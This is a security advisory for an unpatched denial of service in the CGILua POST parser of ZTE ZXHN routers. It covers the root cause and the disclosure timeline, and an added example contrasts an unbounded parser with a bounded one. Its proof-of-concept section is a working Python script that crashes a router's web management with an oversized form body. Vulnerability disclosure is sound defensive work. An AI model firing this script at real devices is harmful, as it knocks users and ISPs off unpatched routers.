-----BEGIN SECURITY ADVISORY-----

Advisory ID: MONX-2026-001
CVE ID: CVE-2026-34473
Title: Unauthenticated Denial of Service via Oversized POST Body in ZTE Router CGILua Parser
Affected: 17+ ZTE ZXHN router models (~140,000 publicly exposed devices)
CVSS Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Date: 2026-05-20
Author: Mina Nageh Salalma (Monx Research)
Contact: minanageh379 () gmail com
Public URL: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34473

AFFECTED PRODUCTS
-----------------
17+ ZTE ZXHN router models sharing the CGILua firmware stack. Estimated 140,000+ devices publicly reachable on the Internet at time of research.

VULNERABILITY DESCRIPTION
-------------------------
The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an upper bound on the body size of application/x-www-form-urlencoded POST requests. An unauthenticated attacker can crash or freeze the router's web management service by sending a single HTTP POST request with an oversized body to any CGI endpoint. No authentication, session cookie, or prior access is required.

ROOT CAUSE
----------
Firmware analysis of extracted squashfs images confirms that post.lua reads the entire POST body into memory before parsing. There is no Content-Length check or body-size limiter before the allocation occurs. Oversized payloads cause the LuCI/CGILua process to exhaust memory or fault, taking down the web management interface until the device is power-cycled.
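To make the root cause concrete, the following is an added illustration written for this advisory, not code from the ZTE firmware or from the advisory author. It models the pattern the root cause describes (read the whole form body, then parse) in Python next to a bounded CGI-style parser that rejects the request before any large allocation happens. The 64 KB limit, the WSGI-like environment dictionary, the function names and the constructed sample bodies are all assumptions made for the example; the advisory gives no vendor value for a safe bound.

```python
# Added example, not ZTE firmware code: contrasts an unbounded form-body read
# with a parser that enforces a size bound before reading or parsing the body.
import io
from urllib.parse import parse_qs

MAX_BODY_BYTES = 64 * 1024   # assumed limit for the example; pick per deployment
MAX_FIELDS = 100             # assumed cap on the number of form fields


def read_body_unbounded(stream):
    """Vulnerable pattern (modelled on the advisory's description of post.lua):
    read everything the client sends into memory before looking at it.
    Memory use is controlled entirely by the remote peer."""
    return stream.read()


def parse_form_post(env, stream, limit=MAX_BODY_BYTES):
    """Hardened pattern: validate method, type and declared size first, and
    only then read exactly the declared number of bytes and parse them.
    Returns (http_status, fields) so callers can answer 413 / 400 / 415."""
    if env.get("REQUEST_METHOD") != "POST":
        return 405, {}
    if not env.get("CONTENT_TYPE", "").startswith("application/x-www-form-urlencoded"):
        return 415, {}
    try:
        length = int(env.get("CONTENT_LENGTH", ""))
    except ValueError:
        return 400, {}            # missing or non-numeric Content-Length
    if length < 0:
        return 400, {}
    if length > limit:
        return 413, {}            # reject before allocating anything
    # Read only the declared length; never "read to EOF" from the peer.
    body = stream.read(length)
    try:
        fields = parse_qs(body.decode("utf-8", errors="replace"),
                          keep_blank_values=True, max_num_fields=MAX_FIELDS)
    except ValueError:
        return 400, {}            # too many fields
    return 200, fields


def make_env(body: bytes) -> dict:
    """Constructed CGI-style environment for a form POST of `body`."""
    return {
        "REQUEST_METHOD": "POST",
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(body)),
    }


def demo():
    """Constructed inputs: a normal login-sized body and an oversized one."""
    normal = b"username=admin&password=secret"
    oversized = b"a=" + b"A" * (256 * 1024)   # same size class the advisory cites
    results = {
        "normal": parse_form_post(make_env(normal), io.BytesIO(normal)),
        "oversized": parse_form_post(make_env(oversized), io.BytesIO(oversized)),
        "unbounded_bytes_held": len(read_body_unbounded(io.BytesIO(oversized))),
    }
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The bounded parser answers the oversized request with 413 having read nothing, while the unbounded read holds every byte the client chose to send; the same ordering (bound check before allocation, read by declared length rather than to EOF) is what a fixed post.lua would need, whatever the concrete limit.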
PROOF OF CONCEPT
----------------
    import requests

    # TARGET_IP is a placeholder for the device under test
    url = "http://TARGET_IP/cgi-bin/luci"
    payload = "a=" + "A" * (256 * 1024)  # 256 KB form body
    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"HTTP {r.status_code}")
    except requests.exceptions.Timeout:
        print("Timeout - DoS successful")
    except requests.exceptions.ConnectionError:
        print("Connection dropped - DoS successful")

IMPACT
------
An unauthenticated attacker on the LAN or WAN (if the management interface is publicly exposed, as is the case for ~140,000 devices) can permanently disable remote management access, forcing a physical reboot to restore access. ISP-deployed devices with no physical access for end users are especially vulnerable.

TIMELINE
--------
2024-05: Local validation on hardware. Firmware extraction and root-cause confirmed.
2024-05: Report sent to ZTE PSIRT.
2025-01: Escalated to MITRE after ZTE failed to respond.
2026-03: MITRE assigned CVE-2026-34473.
2026-05-20: Full public disclosure.

VENDOR RESPONSE
---------------
ZTE PSIRT did not respond to the initial report. MITRE assigned the CVE directly. No patch has been issued.

CREDITS
-------
Mina Nageh Salalma (Monx Research)
https://github.com/minanagehsalalma

-----END SECURITY ADVISORY-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/